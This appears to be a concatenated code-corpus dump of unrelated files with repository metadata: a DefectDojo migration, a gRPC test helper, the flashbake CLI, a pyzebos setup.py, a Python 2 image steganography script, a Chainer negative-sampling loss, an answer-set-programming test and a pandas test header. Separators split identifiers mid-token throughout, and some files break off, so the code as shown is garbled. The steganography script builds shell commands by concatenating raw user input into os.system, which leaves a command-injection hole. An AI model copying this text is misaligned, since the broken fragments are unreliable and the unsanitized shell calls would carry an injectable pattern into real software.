color((randint(1, 255),randint(1, 255),randint(1, 255)),(randint(1, 255),randint(1, 255),randint(1, 255)))
begin_fill()
for i in range(side_n):
forward(
|
100)
left(360/side_n)
end_fill()
|
rackerlabs/django-DefectDojo
|
dojo/db_migrations/0022_google_sheet_sync_additions.py
|
Python
|
bsd-3-clause
| 963
| 0
|
# Generated by Django 2.2.1 on 2019-09-19 11:28
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dojo', '0021_cve_index'),
]
operations = [
migrations.AddField(
model_name='system_settings',
name='credentials',
field=models.CharField(max_length=3000, blank=True),
),
migrations.Add
|
Field(
model_name='system_settings',
name='column_widths',
field=models.CharField(max_length=1500, blank=True),
),
migrations.AddF
|
ield(
model_name='system_settings',
name='drive_folder_ID',
field=models.CharField(max_length=100, blank=True),
),
migrations.AddField(
model_name='system_settings',
name='enable_google_sheets',
field=models.BooleanField(null=True, blank=True, default=False),
),
]
|
ctiller/grpc
|
tools/run_tests/xds_k8s_test_driver/framework/rpc/grpc.py
|
Python
|
apache-2.0
| 3,227
| 0
|
# Copyright 2020 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import re
from typing import ClassVar, Dict, Optional
from google.protobuf import json_format
import google.protobuf.message
import grpc
logger = logging.getLogger(__name__)
# Type aliases
Message = google.protobuf.message.Message
class GrpcClientHelper:
channel: grpc.Channel
DEFAULT_RPC_DEADLINE_SEC = 90
def __init__(self, channel: grpc.Channel, stub_class: ClassVar):
self.channel = channel
self.stub = stub_class(channel)
# This is purely cosmetic to make RPC logs look like method calls.
self.log_service_name = re.sub('Stub$', '',
self.stub.__class__.__name__)
def call_unary_with_deadline(
self,
*,
rpc: str,
req: Message,
deadline_sec: Optional[int] = DEFAULT_RPC_DEADLINE_SEC,
lo
|
g_level: Optional[int] = logging.DEBUG) -> Message:
if deadline_sec is None:
deadline_sec = self.DEFAULT_RPC_DEADLINE_SEC
call_kwargs = dict(wait_for_ready=True, timeout=deadline_sec)
self._log_rpc_request(rpc, req, call_kwargs, log_
|
level)
# Call RPC, e.g. RpcStub(channel).RpcMethod(req, ...options)
rpc_callable: grpc.UnaryUnaryMultiCallable = getattr(self.stub, rpc)
return rpc_callable(req, **call_kwargs)
def _log_rpc_request(self, rpc, req, call_kwargs, log_level=logging.DEBUG):
logger.log(logging.DEBUG if log_level is None else log_level,
'RPC %s.%s(request=%s(%r), %s)', self.log_service_name, rpc,
req.__class__.__name__, json_format.MessageToDict(req),
', '.join({f'{k}={v}' for k, v in call_kwargs.items()}))
class GrpcApp:
channels: Dict[int, grpc.Channel]
class NotFound(Exception):
"""Requested resource not found"""
def __init__(self, message):
self.message = message
super().__init__(message)
def __init__(self, rpc_host):
self.rpc_host = rpc_host
# Cache gRPC channels per port
self.channels = dict()
def _make_channel(self, port) -> grpc.Channel:
if port not in self.channels:
target = f'{self.rpc_host}:{port}'
self.channels[port] = grpc.insecure_channel(target)
return self.channels[port]
def close(self):
# Close all channels
for channel in self.channels.values():
channel.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
return False
def __del__(self):
self.close()
|
commandline/flashbake
|
src/flashbake/console.py
|
Python
|
gpl-3.0
| 11,505
| 0.005389
|
#!/usr/bin/env python
''' flashbake - wrapper script that will get installed by setup.py into the execution path '''
# copyright 2009 Thomas Gideon
#
# This file is part of flashbake.
#
# flashbake is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# flashbake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with flashbake. If not, see <http://www.gnu.org/licenses/>.
from flashbake import commit, context, control
from flashbake.plugins import PluginError, PLUGIN_ERRORS
from optparse import OptionParser
from os.path import join, realpath
import flashbake.git
import fnmatch
import logging
import os.path
import sys
VERSION = flashbake.__version__
pattern = '.flashbake'
def main():
''' Entry point used by the setup.py installation script. '''
# handle options and arguments
parser = _build_main_parser()
(options, args) = parser.parse_args()
if options.quiet and options.verbose:
parser.error('Cannot specify both verbose and quiet')
# configure logging
level = logging.INFO
if options.verbose:
level = logging.DEBUG
if options.quiet:
level = logging.ERROR
logging.basicConfig(level=level,
format='%(message)s')
home_dir = os.path.expanduser('~')
# look for plugin directory
_load_plugin_dirs(options, home_dir)
if len(args) < 1:
parser.error('Must specify project directory.')
sys.exit(1)
project_dir = args[0]
# look for user's default control file
hot_files, control_config = _load_user_control(home_dir, project_dir, options)
# look for project control file
control_file = _find_control(parser, project_dir)
if None == control_file:
sys.exit(1)
# emit the context message and exit
if options.context_only:
sys.exit(_context_only(options, project_dir, control_file, control_config, hot_files))
quiet_period = 0
if len(args) == 2:
try:
quiet_period = int(args[1])
except:
parser.error(f'Quiet minutes, "{args[1]}", must be a valid number.' )
sys.exit(1)
try:
(hot_files, control_config) = control.parse_control(project_dir, control_file, control_config, hot_files)
control_config.context_only = options.context_only
control_config.dry_run = options.dryrun
if (options.dryrun):
logging.info('========================================')
logging.info('!!! Running in dry run mode. !!!')
logging.info('!!! No changes will be committed. !!!')
logging.info('========================================\n\n')
(hot_files, control_config) = control.prepare_control(hot_files, control_config)
if options.purge:
commit.purge(control_config, hot_files)
else:
commit.commit(control_config, hot_files, quiet_period)
if (options.dryrun):
logging.info('\n\n========================================')
logging.info('!!! Running in dry run mode. !!!')
logging.info('!!! No changes will be committed. !!!')
logging.info('========================================')
except (flashbake.git.VCError, flashbake.ConfigError) as error:
logging.error(f'Error: {str(error)}' )
sys.exit(1)
except PluginError as error:
_handle_bad_plugin(error)
sys.exit(1)
def multiple_projects():
parser = _build_multi_parser()
(options, args) = parser.parse_args()
if len(args) < 1:
parser.error('Must specify root search directory.')
sys.exit(1)
flashbake_opts = options.flashbake_options.split()
# verify --options will pass to main flashbake program
test_argv = sys.argv[0:1] + flashbake_opts + ['.'] + args[1:]
main_parser = _build_main_parser()
main_parser.suppress_exit = True
try:
(test_options, test_args) = main_parser.parse_args(test_argv)
except ParserError as err:
msg = "error with arguments passed to main flashbake: %s\n%s" % (
"'" + "' '".join(
flashbake_opts + ['<project_dir>'] + args[1:]) + "'",
err.msg.replace(parser.get_prog_name() + ':', '> '))
parser.exit(err.code, msg)
exit_code = 0
for project in _locate_projects(args[0]):
print (f"project: {project}")
sys.argv = sys.argv[0:1] + flashbake_opts + [project] + args[1:]
try:
main()
except SystemExit as err:
if err.code != 0:
exit_code = err.code
logging.error(f"Error: 'flashbake' had an error for '{project}'"
)
sys.exit(exit_code)
def _locate_projects(root):
for path, dirs, files in os.walk(root): #@UnusedVariable
for project_path in (
os.path.normpath(path) for filename in files \
if fnmatch.fnmatch(filename, pattern)):
yield project_path
class ParserError(RuntimeError):
def __init__(self, code=0, msg=''):
RuntimeError.__init__(self, code, msg)
def _get_msg(self):
return self.args[1]
def _get_code(self):
return self.args[0]
msg = property(_get_msg)
code = property(_get_code)
class FlashbakeOptionParser(OptionParser):
def __init__(self, *args, **kwargs):
OptionParser.__init__(self, *args, **kwargs)
self.suppress_exit =
|
False
def print_usage(self, file=None):
if not self.suppress_exit:
OptionPars
|
er.print_usage(self, file)
def exit(self, status=0, msg=None):
if self.suppress_exit:
raise ParserError(status, msg)
else:
OptionParser.exit(self, status, msg)
def _build_main_parser():
usage = "usage: %prog [options] <project_dir> [quiet_min]"
parser = FlashbakeOptionParser(
usage=usage, version='{0} {1}'.format('%prog', VERSION))
parser.add_option('-c', '--context', dest='context_only',
action='store_true', default=False,
help='just generate and show the commit message, don\'t check for changes')
parser.add_option('-v', '--verbose', dest='verbose',
action='store_true', default=False,
help='include debug information in the output')
parser.add_option('-q', '--quiet', dest='quiet',
action='store_true', default=False,
help='disable all output excepts errors')
parser.add_option('-d', '--dryrun', dest='dryrun',
action='store_true', default=False,
help='execute a dry run')
parser.add_option('-p', '--plugins', dest='plugin_dir',
action='store', type='string', metavar='PLUGIN_DIR',
help='specify an additional location for plugins')
parser.add_option('-r', '--purge', dest='purge',
action='store_true', default=False,
help='purge any files that have been deleted from source control')
return parser
def _build_multi_parser():
usage = "usage: %prog [options] <search_root> [quiet_min]"
parser = FlashbakeOptionParser(
usage=usage, version='{0} {1}'.format ('%prog', VERSION))
parser.add_option('-o', '--options', dest='flashbake_options', default='',
action='store', type='string', metavar='FLASHBAKE_OPTS',
help=("options to pass through to the 'flashbake' "
"command. Use quotes to pass multiple arguments."))
return parser
def _load_plugin_dirs(options, home_dir):
plugin_dir = join(home_dir, '.flashbake', 'plugins')
if os.path.exists(plugin_dir):
real_plugin_dir = realpath(plugin_dir)
logging.debug
|
atopuzov/pyzebos
|
setup.py
|
Python
|
mit
| 2,544
| 0.00118
|
# -*- coding: utf-8 -*-
# The MIT License (MIT)
# Copyright (c) 2014 Aleksandar Topuzović <aleksandar.topuzovic@gmail.com>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documenta
|
tion files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice sha
|
ll be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
import sys
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = ['--strict', '--verbose', '--tb=long',
'--cov', 'pyzebos', '--cov-report',
'term-missing', 'tests']
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.test_args)
sys.exit(errno)
setup(
author='Aleksandar Topuzović',
author_email='aleksandar.topuzovic@gmail.com',
classifiers=[
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
'Topic :: Software Development :: Library',
],
cmdclass={'test': PyTest},
description='Parser for ZebOS routing configuration',
install_requires=['pyparsing'],
keywords='pyparsing parser zebos quagga',
license='MIT License',
long_description="",
name='pyzebos',
package_data={'': ['LICENSE']},
package_dir={'pyzebos': 'pyzebos'},
packages=find_packages(exclude=['docs', 'tests*']),
setup_requires=['flake8'],
tests_require=['pytest', 'pytest-cov'],
url='https://github.com/atopuzov/pyzebos',
version='0.0.1',
)
|
agusmakmun/Some-Examples-of-Simple-Python-Script
|
Stegano-Extract-and-Read-File-From-Image/script.py
|
Python
|
agpl-3.0
| 2,974
| 0.025891
|
"""
Name : Stegano Extract and Read File From Image
Created By : Agus Makmun (Summon Agus)
Blog : bloggersmart.net - python.web.id
License : GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007
Documentation : https://github.com/agusmakmun/Some-Examples-of-Simple-Python-Script/
"""
import os
import time, zipfile
class scureImage(object):
def _secure(self, image, zipfile, new_image):
return os.system("cat "+image+" "+zipfile+" > "+new_image)
def _openScure(self, new_image):
return os.system("unzip "+new_image)
def _stegano(self, zipFile):
archive = zipfile.ZipFile(zipFile, 'r')
list_name = archive.namelist()
print "[+] This list of files in the image."
print "+---------------------------------------+"
print " ", list_name
print "+---------------------------------------+"
file_open = raw_input("[+] Type file want to read.\n[+] >>> ")
try:
print "[+] This content of { "+file_open+" }"
print "+---------------------------------------+"
print archive.read(file_open)
print "+---------------------------------------+\n"
except KeyError:
print "[-] Uppss, {", file_open, "} is not found at this file."
print "[-] Please check again!"
def main(self):
print "\n\tWelcome to Python Scure Image { STEGANO METHOD }"
print "[+] Please choice this options:"
print " 1. Saved files in imag
|
e."
print " 2. Extract files from image."
print " 3. Stegano read file from image.\n"
mome = scureImage()
choice = raw_input("[+] >>> ")
if choice == "1":
print os.listdir(".")
img = raw_input("[+] Type Image file that will save your archive.\n[
|
+] >>> ")
zip = raw_input("[+] Type your Zip file: ")
new_img = raw_input("[+] Type New Image that will save your zip: ")
mome._secure(img, zip, new_img)
print os.listdir(".")
elif choice == "2":
print os.listdir(".")
new_img = raw_input("[+] Type Image that will going to Extract all files.\n[+] >>> ")
mome._openScure(new_img)
time.sleep(2)
print os.listdir(".")
elif choice == "3":
print os.listdir(".")
zipName = raw_input("[+] Type Image where your file was saved.\n[+] >>> ")
try:
mome._stegano(zipName)
except IOError:
print "[-] Uppss, {", zipName, "} is not image or not found at this directory."
print "[-] Please check again!"
if __name__ == "__main__":
mome = scureImage()
mome.main()
|
AlpacaDB/chainer
|
chainer/functions/loss/negative_sampling.py
|
Python
|
mit
| 6,667
| 0
|
import numpy
import six
from chainer import cuda
from chainer import function
from chainer.utils import type_check
class NegativeSamplingFunction(function.Function):
def __init__(self, sampler, sample_size):
self.sampler = sampler
self.sample_size = sample_size
def _make_samples(self, t):
if hasattr(self, 'samples'):
return self.samples # for testing
size = int(t.shape[0])
# first one is the positive, and others are sampled negatives
samples = self.sampler((size, self.sample_size + 1))
samples[:, 0] = t
self.samples = samples
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 3)
x_type, t_type, w_type = in_types
type_check.expect(
x_type.dtype == numpy.float32,
x_type.ndim == 2,
t_type.dtype == numpy.int32,
t_type.ndim == 1,
x_type.shape[0] == t_type.shape[0],
w_type.dtype == numpy.float32,
w_type.ndim == 2,
)
def forward_cpu(self, inputs):
x, t, W = inputs
self._make_samples(t)
loss = numpy.float32(0.0)
for i, (ix, k) in enumerate(six.moves.zip(x, self.samples)):
w = W[k]
f = w.dot(ix)
f[0] *= -1 # positive sample
loss += numpy.sum(numpy.logaddexp(f, 0))
return numpy.array(loss, numpy.float32),
def forward_gpu(self, inputs):
x, t, W = inputs
n_in = x.shape[1]
self._make_samples(t)
self.wx = cuda.elementwise(
'raw T W, raw T x, S k, int32 c, int32 m', 'T wx',
'''
T f = 0;
for (int j = 0; j < c; ++j) {
int x_ind[] = {(i / m), j};
int w_ind[] = {k, j};
f += x[x_ind] * W[w_ind];
}
wx = f;
''',
'negative_sampling_wx'
)(W, x, self.samples, n_in, self.sample_size + 1)
y = cuda.elementwise(
'T wx, int32 c, int32 m', 'T y',
'''
T f = wx;
if (i % m == 0) {
f = -f;
}
T loss;
if (f < 0) {
loss = __logf(1 + __expf(f));
|
} else {
loss = f + __logf(1 + __expf(-f));
}
y = l
|
oss;
''',
'negative_sampling_forward'
)(self.wx, n_in, self.sample_size + 1)
# TODO(okuta): merge elementwise
loss = cuda.cupy.sum(y)
return loss,
def backward_cpu(self, inputs, grads):
x, t, W = inputs
gloss, = grads
gx = numpy.zeros_like(x)
gW = numpy.zeros_like(W)
for i, (ix, k) in enumerate(six.moves.zip(x, self.samples)):
w = W[k]
f = w.dot(ix)
# g == -y * gloss / (1 + exp(yf))
f[0] *= -1
g = gloss / (1 + numpy.exp(-f))
g[0] *= -1
gx[i] = g.dot(w)
for ik, ig in six.moves.zip(k, g):
gW[ik] += ig * ix
return gx, None, gW
def backward_gpu(self, inputs, grads):
cupy = cuda.cupy
x, t, W = inputs
gloss, = grads
n_in = x.shape[1]
g = cuda.elementwise(
'T wx, raw T gloss, int32 m', 'T g',
'''
T y;
if (i % m == 0) {
y = 1;
} else {
y = -1;
}
g = -y * gloss[0] / (1.0f + __expf(wx * y));
''',
'negative_sampling_calculate_g'
)(self.wx, gloss, self.sample_size + 1)
gx = cupy.zeros_like(x)
cuda.elementwise(
'raw T g, raw T W, raw S k, int32 c, int32 m', 'T gx',
'''
int d = i / c;
T w = 0;
for (int j = 0; j < m; ++j) {
w += g[d * m + j] * W[k[d * m + j] * c + i % c];
}
gx = w;
''',
'negative_sampling_calculate_gx'
)(g, W, self.samples, n_in, self.sample_size + 1, gx)
gW = cupy.zeros_like(W)
cuda.elementwise(
'T g, raw T x, S k, int32 c, int32 m', 'raw T gW',
'''
T gi = g;
for (int j = 0; j < c; ++j) {
atomicAdd(&gW[k * c + j], gi * x[(i / m) * c + j]);
}
''',
'negative_sampling_calculate_gw'
)(g, x, self.samples, n_in, self.sample_size + 1, gW)
return gx, None, gW
def negative_sampling(x, t, W, sampler, sample_size):
"""Negative sampling loss function.
In natural language processing, especially language modeling, the number of
vocabulary is very large.
Therefore, you need to spend a lot of time to calculate the gradient of the
embedding matrix.
Instead, in negative sampling trick, you only need to calculate the
gradient for a few sampled negative examples.
The objective function is below:
.. math::
f(x, p) = \\log \\sigma(x^\\top w_p) + \\
k E_{i \\sim P(i)}[\\log \\sigma(- x^\\top w_i)],
where :math:`\\sigma(\\cdot)` is a sigmoid function, :math:`w_i` is the
weight vector for the word :math:`i`, and :math:`p` is a positive example.
It is approximated with :math:`k` examples :math:`N` sampled from
probability :math:`P(i)`, like this:
.. math::
f(x, p) \\approx \\log \\sigma(x^\\top w_p) + \\
\\sum_{n \\in N} \\log \\sigma(-x^\\top w_n).
Each sample of :math:`N` is drawn from the word distribution :math:`P(w)`.
This is calculated as :math:`P(w) = \\frac{1}{Z} c(w)^\\alpha`, where
:math:`c(w)` is the unigram count of the word :math:`w`, :math:`\\alpha` is
a hyper-parameter, and :math:`Z` is the normalization constant.
Args:
x (~chainer.Variable): Batch of input vectors.
t (~chainer.Variable): Vector of ground truth labels.
W (~chainer.Variable): Weight matrix.
sampler (~types.FunctionType): Sampling function. It takes a shape and
returns an integer array of the shape. Each element of this array
is a sample from the word distribution.
A :class:`~chainer.utils.WalkerAlias` object built with the power
distribution of word frequency is recommended.
sample_size (int): Number of samples.
See: `Distributed Representations of Words and Phrases and their\
Compositionality <http://arxiv.org/abs/1310.4546>`_
.. seealso:: :class:`~chainer.links.NegativeSampling`.
"""
return NegativeSamplingFunction(sampler, sample_size)(x, t, W)
|
Yarrick13/hwasp
|
tests/asp/gringo/modelchecker.046.test.py
|
Python
|
apache-2.0
| 186,113
| 0.00029
|
input = """
p24|p8|not_p15:-p7,p2,not p25.
p11|not_p20|p8|not_p15:-p24,p2.
p3|p20|p18|p3:-p1,not p22.
not_p5|not_p5|not_p19|p22.
p1|p12|p2|not_p16:-not p23,not p3.
p3|not_p20|p18:-p13,not p22,not p14.
p17|p12|p8|not_p8.
p15|not_p22|p24|not_p12.
not_p21|p20|p18:-p1,not p22.
p24|p9|p24|not_p22:-p12,p23.
not_p2|not_p24|p9:-p1,p12,not p11.
p11|not_p20|not_p1|not_p4:-p24,p2.
p2|p24|p15:-not p23.
p24|p9|p24|p10:-p12,p23.
:-p19,not_p19.
p15|p4|p3|p1:-p12,p5.
p21|p5|p12|not_p20:-p14.
p12|not_p15|p16|p17:-p6,p1.
p1|p14|p2|p11:-not p5,p24.
not_p22|p24|p15:-not p23.
not_p21|p20|p18|p3:-p13,not p22.
p17|p12|p8|p25.
p15|p6:-p19,p5,not p3,not p7.
not_p25|p14|p9|not_p3.
:-p16,not_p16.
not_p23|p7|p21|p5:-p13,not p3.
p1|p15|p15|p11:-not p5,p24.
p6|not_p15|p7|p17:-p6,p1.
p3|p20|p18:-p1,not p22.
p19|p1|p12:-p19,not p23,not p11.
p24|not_p8|p6|not_p22:-p12,p23.
p5|p11|p25|not_p20:-p17,not p7.
p6|p9|p6|not_p22:-p19,p23.
not_p5:-not p5.
p1|p15|p15|not_p18:-not p5,p24.
p6|p7:-p19,not p23,not p3,not p11.
p6|p4|p7|p18:-p9,p1.
p24|p9|p24|not_p22:-p19,p23.
p11|p8|p4|p16.
p21|p22|p11|p25|not_p20:-p17.
not_p20|not_p1|not_p4:-p7,p2,not p25.
not_p21|p15|p22|not_p12.
not_p23|p7|not_p17|p5:-p13,not p3.
p21|p5|p12|not_p20:-p17.
p12|not_p15|p16|p18:-p9,p1.
p15|p11|p24|p3.
p21|p22|p12|p25|not_p20:-p14.
p3|p21|not_p20:-p6,p23,not p4.
p17|p6|not_p19|not_p8.
not_p4:-not p4.
"""
output = """
{p25, p18, p1, not_p5, p17, p15, not_p4, p21, p14, p16}
{p25, p20, p1, not_p5, p17, p15, not_p4, p21, p14, p16}
{p2, p25, not_p5, p17, p15, not_p4, p21, p14, p16}
{p25, p18, p1, not_p5, p17, p15, not_p4, p21, p16, not_p3}
{p25, p20, p1, not_p5, p17, p15, not_p4, p21, p16, not_p3}
{p2, p25, not_p5, p17, p15
|
, not_p4, p21, p16, not_p3}
{p25, p18, p1, not_p5, p17, p15, not_p4, p21, p16, not_p25}
{p25, p20, p1, not_p5, p17, p15, not_p4, p21, p16, not_p25}
{p2, p25, not_p5, p17, p15, not_p4, p21, p16, not_p25}
{p7, p20, p1, not_p5, p17, p15, p9, not_p4, p21, p16}
{p11, p20, p1, not_p5, p17, p15, p9, not_p4, p21, p16, p6}
{p25, p20, p1, not_p5, p17, p15, p9, not_p4, p21, p16, p6}
{p25, p18, p1, not_p5, p17, p15, p9, not_p4, p21, p16}
{p2, p25,
|
not_p5, p17, p15, p9, not_p4, p21, p16}
{not_p20, not_p5, p12, p17, p15, not_p4, p16, not_p3}
{not_p20, p18, p1, not_p5, p17, p15, not_p4, p16, not_p3}
{not_p20, p20, p1, not_p5, p17, p15, not_p4, p16, not_p3}
{p2, not_p20, not_p5, p17, p15, not_p4, p16, not_p3}
{not_p20, not_p5, p12, p17, p15, not_p4, p16, not_p25}
{not_p20, p18, p1, not_p5, p17, p15, not_p4, p16, not_p25}
{not_p20, p20, p1, not_p5, p17, p15, not_p4, p16, not_p25}
{p2, not_p20, not_p5, p17, p15, not_p4, p16, not_p25}
{not_p20, not_p5, p12, p17, p15, not_p4, p14, p16}
{not_p20, p18, p1, not_p5, p17, p15, not_p4, p14, p16}
{not_p20, p20, p1, not_p5, p17, p15, not_p4, p14, p16}
{p2, not_p20, not_p5, p17, p15, not_p4, p14, p16}
{not_p20, p18, p1, not_p5, p17, p15, p9, not_p4, p16}
{not_p20, p20, p1, not_p5, p17, p15, p9, not_p4, p16, p6}
{p7, not_p20, p20, p1, not_p5, p17, p15, p9, not_p4, p16}
{not_p20, not_p5, p12, p17, p15, p9, not_p4, p16}
{p2, not_p20, not_p5, p17, p15, p9, not_p4, p16}
{p25, not_p5, p12, p17, p15, not_p4, p16, not_p3}
{p25, not_p5, p12, p17, p15, not_p4, p16, not_p25}
{p25, not_p5, p12, p17, p15, not_p4, p14, p16}
{p25, not_p5, p12, p17, p15, p9, not_p4, p16}
{p2, p25, not_p5, not_p8, p15, not_p4, p16, not_p3}
{p25, p18, p1, not_p5, not_p8, p15, not_p4, p16, not_p3}
{p25, p20, p1, not_p5, not_p8, p15, not_p4, p16, not_p3}
{not_p5, p12, not_p8, p15, not_p4, p16, not_p3}
{p2, p25, not_p5, not_p8, p15, not_p4, p16, not_p25}
{p25, p18, p1, not_p5, not_p8, p15, not_p4, p16, not_p25}
{p25, p20, p1, not_p5, not_p8, p15, not_p4, p16, not_p25}
{not_p5, p12, not_p8, p15, not_p4, p16, not_p25}
{p25, p18, p1, not_p5, not_p8, p15, not_p4, p21, p14, p16}
{p25, p20, p1, not_p5, not_p8, p15, not_p4, p21, p14, p16}
{p2, p25, not_p5, not_p8, p15, not_p4, p21, p14, p16}
{p25, not_p20, p18, p1, not_p5, not_p8, p15, not_p4, p14, p16}
{p25, not_p20, p20, p1, not_p5, not_p8, p15, not_p4, p14, p16}
{p2, p25, not_p20, not_p5, not_p8, p15, not_p4, p14, p16}
{p25, p18, p1, not_p5, not_p8, p15, p9, not_p4, p16}
{p25, p20, p1, not_p5, not_p8, p15, p9, not_p4, p16, p6}
{p7, p25, p20, p1, not_p5, not_p8, p15, p9, not_p4, p16}
{p2, p25, not_p5, not_p8, p15, p9, not_p4, p16}
{p8, p7, p20, p1, not_p5, not_p8, p15, p9, not_p4, p16}
{not_p5, p12, not_p8, p15, not_p4, p14, p16}
{not_p5, p12, not_p8, p15, p9, not_p4, p16}
{p8, p18, p1, not_p5, p15, p9, not_p4, p16, p6}
{p8, p18, p1, not_p5, p15, not_p4, p16, p6, not_p3}
{p8, p18, p1, not_p5, p15, not_p4, p16, p6, not_p25}
{p8, p18, p1, not_p5, p15, not_p4, p21, p14, p16, p6}
{p8, not_p20, p18, p1, not_p5, p15, not_p4, p14, p16, p6}
{p8, p20, p1, not_p5, p15, p9, not_p4, p16, p6}
{p8, p20, p1, not_p5, p15, not_p4, p16, p6, not_p3}
{p8, p20, p1, not_p5, p15, not_p4, p16, p6, not_p25}
{p8, p20, p1, not_p5, p15, not_p4, p21, p14, p16, p6}
{p8, not_p20, p20, p1, not_p5, p15, not_p4, p14, p16, p6}
{p8, p7, p20, p1, not_p5, not_p19, p15, p9, not_p4, p16}
{not_p5, not_p19, p12, p15, not_p4, p16, not_p3}
{not_p5, p12, p15, not_p4, p16, p6, not_p3}
{not_p5, p12, p15, not_p4, p14, p16, p6}
{not_p5, p12, p15, not_p4, p16, p6, not_p25}
{not_p5, p12, p15, p9, not_p4, p16, p6}
{not_p5, not_p19, p12, p15, not_p4, p14, p16}
{not_p5, not_p19, p12, p15, not_p4, p16, not_p25}
{not_p5, not_p19, p12, p15, p9, not_p4, p16}
{p22, p12, p17, p15, not_p4, p5, p16, not_p3}
{p1, p22, p17, p15, not_p4, p5, p16, not_p3}
{p2, p22, p17, p15, not_p4, p5, p16, not_p3}
{p22, p12, p17, p15, not_p4, p5, p16, not_p25}
{p1, p22, p17, p15, not_p4, p5, p16, not_p25}
{p2, p22, p17, p15, not_p4, p5, p16, not_p25}
{p22, p12, p17, p15, not_p4, p5, p14, p16}
{p1, p22, p17, p15, not_p4, p5, p14, p16}
{p2, p22, p17, p15, not_p4, p5, p14, p16}
{p22, p12, p17, p15, p9, not_p4, p5, p16}
{p1, p22, p17, p15, p9, not_p4, p5, p16, p6}
{p18, p1, p22, p17, p15, p9, not_p4, p5, p16}
{p7, p1, p22, p17, p15, p9, not_p4, p5, p16}
{p2, p22, p17, p15, p9, not_p4, p5, p16}
{p18, p1, not_p19, p17, p15, not_p4, p5, p21, p16, not_p3}
{p20, p1, not_p19, p17, p15, not_p4, p5, p21, p16, not_p3}
{p2, not_p19, p17, p15, not_p4, p5, p21, p16, not_p3}
{not_p5, p12, p17, p15, not_p4, p5, p21, p16, not_p3}
{p18, p1, not_p5, p17, p15, not_p4, p5, p21, p16, not_p3}
{p20, p1, not_p5, p17, p15, not_p4, p5, p21, p16, not_p3}
{p2, not_p5, p17, p15, not_p4, p5, p21, p16, not_p3}
{p25, p18, p1, not_p19, p17, p15, not_p4, p5, p16, not_p3}
{p25, p20, p1, not_p19, p17, p15, not_p4, p5, p16, not_p3}
{p2, p25, not_p19, p17, p15, not_p4, p5, p16, not_p3}
{p25, p18, p1, not_p5, p17, p15, not_p4, p5, p16, not_p3}
{p25, p20, p1, not_p5, p17, p15, not_p4, p5, p16, not_p3}
{p2, p25, not_p5, p17, p15, not_p4, p5, p16, not_p3}
{p18, p1, not_p19, p17, p15, not_p4, p5, p21, p16, not_p25}
{p20, p1, not_p19, p17, p15, not_p4, p5, p21, p16, not_p25}
{p2, not_p19, p17, p15, not_p4, p5, p21, p16, not_p25}
{not_p5, p12, p17, p15, not_p4, p5, p21, p16, not_p25}
{p18, p1, not_p5, p17, p15, not_p4, p5, p21, p16, not_p25}
{p20, p1, not_p5, p17, p15, not_p4, p5, p21, p16, not_p25}
{p2, not_p5, p17, p15, not_p4, p5, p21, p16, not_p25}
{p25, p18, p1, not_p19, p17, p15, not_p4, p5, p16, not_p25}
{p25, p20, p1, not_p19, p17, p15, not_p4, p5, p16, not_p25}
{p2, p25, not_p19, p17, p15, not_p4, p5, p16, not_p25}
{p25, p18, p1, not_p5, p17, p15, not_p4, p5, p16, not_p25}
{p25, p20, p1, not_p5, p17, p15, not_p4, p5, p16, not_p25}
{p2, p25, not_p5, p17, p15, not_p4, p5, p16, not_p25}
{p18, p1, not_p19, p17, p15, not_p4, p5, p21, p14, p16}
{p20, p1, not_p19, p17, p15, not_p4, p5, p21, p14, p16}
{p2, not_p19, p17, p15, not_p4, p5, p21, p14, p16}
{not_p5, p12, p17, p15, not_p4, p5, p21, p14, p16}
{p18, p1, not_p5, p17, p15, not_p4, p5, p21, p14, p16}
{p20, p1, not_p5, p17, p15, not_p4, p5, p21, p14, p16}
{p2, not_p5, p17, p15, not_p4, p5, p21, p14, p16}
{p25, p18, p1, not_p19, p17, p15, not_p4, p5, p14, p16}
{p25, p20, p1, not_p19, p17, p15, not_p4, p5, p14, p16}
{p2, p25, not_p19, p17, p15, not_p4, p5, p14, p16}
{p25, p18, p1, not_p5, p17, p15, not_p4, p5, p14, p16}
{p25, p20, p1, not_p5, p17, p15, not_p4, p5, p14, p1
|
rs2/pandas
|
pandas/tests/indexing/test_iloc.py
|
Python
|
bsd-3-clause
| 46,354
| 0.001079
|
""" test positional based indexing with iloc """
from datetime import datetime
import re
from warnings import (
catch_warnings,
simplefilter,
)
import numpy as np
import pytest
import pandas.util._test_decorators as td
from pandas import (
NA,
Categorical,
